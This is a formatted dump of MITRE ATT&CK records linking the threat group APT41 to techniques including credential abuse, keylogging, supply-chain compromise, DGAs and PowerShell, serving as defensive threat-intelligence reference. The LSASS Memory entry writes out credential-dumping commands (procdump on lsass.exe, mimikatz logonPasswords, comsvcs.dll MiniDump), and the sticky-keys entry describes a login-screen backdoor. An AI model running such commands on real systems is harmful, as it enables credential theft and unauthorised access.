'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used compromised credentials to log on to other systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
|
||
relationship_id : relationship--0528b64e-e719-44a9-94aa-0576bd9a87ec
|
||
revoked : False
|
||
technique : Valid Accounts
|
||
technique_description : Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
|
||
|
||
In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)
|
||
|
||
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
|
||
technique_id : T1078
|
||
matrix : mitre-attack
|
||
platform : ['Windows', 'Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Linux', 'macOS', 'Google Workspace', 'Containers', 'Network']
|
||
data_sources : ['Logon Session: Logon Session Creation', 'User Account: User Account Authentication', 'Logon Session: Logon Session Metadata']
|
||
permissions_required : ['User', 'Administrator']
|
||
effective_permissions : ['User', 'Administrator']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a keylogger called GEARSHIFT on a target system.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--f480c10c-6a40-4fc7-9380-c2690c70a599
|
||
revoked : False
|
||
technique : Keylogging
|
||
technique_description : Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)
|
||
|
||
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
|
||
|
||
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
|
||
* Reading raw keystroke data from the hardware buffer.
|
||
* Windows Registry modifications.
|
||
* Custom drivers.
|
||
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
|
||
technique_id : T1056.001
|
||
matrix : mitre-attack
|
||
platform : ['Windows', 'macOS', 'Linux', 'Network']
|
||
data_sources : ['Driver: Driver Load', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Modification']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--10d118e8-c421-486f-a56a-bbe1ed621c62
|
||
revoked : False
|
||
technique : Compromise Software Supply Chain
|
||
technique_description : Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
|
||
|
||
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
|
||
technique_id : T1195.002
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['File: File Metadata']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--8488f2ee-be97-458c-894b-830add635fa8
|
||
revoked : False
|
||
technique : Domain Generation Algorithms
|
||
technique_description : Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
|
||
|
||
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc.). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
|
||
|
||
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact with the primary command and control server is lost, malware may employ a DGA as a means of reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1568.002
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Network Traffic: Network Traffic Flow']
|
||
permissions_required : ['User']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a tool called CLASSFON to covertly proxy network communications.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--cb0931f7-4d6c-4f21-95a8-fd9d74ba30e0
|
||
revoked : False
|
||
technique : Proxy
|
||
technique_description : Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
|
||
|
||
Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1090
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows', 'Network']
|
||
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
|
||
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--556f8dd8-50e0-4115-9815-c20bfc2b915a
revoked : False
technique : External Remote Services
technique_description : Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)

Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn't require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1133
matrix : mitre-attack
platform : ['Windows', 'Linux', 'Containers', 'macOS']
data_sources : ['Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Metadata', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Content']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--6160a359-35cc-4bbe-ac29-500f2751ed4b
revoked : False
technique : Spearphishing Attachment
technique_description : Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1566.001
matrix : mitre-attack
platform : ['macOS', 'Windows', 'Linux']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Application Log: Application Log Content', 'File: File Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to masquerade their files as popular anti-virus software.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--285baef5-e948-4e56-a078-5e7f5e7404fd
revoked : False
technique : Match Legitimate Name or Location
technique_description : Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Containers']
data_sources : ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Metadata', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims' environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)
relationship_id : relationship--1aaecef9-d21a-420c-a6c0-53cca7a5e5d8
revoked : False
technique : PowerShell
technique_description : Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Script: Script Execution', 'Process: Process Creation', 'Process: Process Metadata', 'Command: Command Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged sticky keys to establish persistence.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--728c2a84-ac7d-4b17-a287-4c692d717065
revoked : False
technique : Accessibility Features
technique_description : Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times, and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later, as well as Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)

* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1546.008
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Windows Registry: Windows Registry Key Modification']
permissions_required : ['Administrator']
effective_permissions : ['SYSTEM']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used hashdump, [Mimikatz](https://attack.mitre.org/software/S0002), and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--cbbbc655-e5a7-40e9-be62-7f29727b9f0c
|
||
revoked : False
|
||
technique : LSASS Memory
|
||
technique_description : Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
|
||
|
||
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
|
||
|
||
For example, on the target host use procdump:
|
||
|
||
* <code>procdump -ma lsass.exe lsass_dump</code>
|
||
|
||
Locally, mimikatz can be run using:
|
||
|
||
* <code>sekurlsa::Minidump lsassdump.dmp</code>
|
||
* <code>sekurlsa::logonPasswords</code>
|
||
|
||
Built-in Windows tools such as comsvcs.dll can also be used:
|
||
|
||
* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
|
||
|
||
|
||
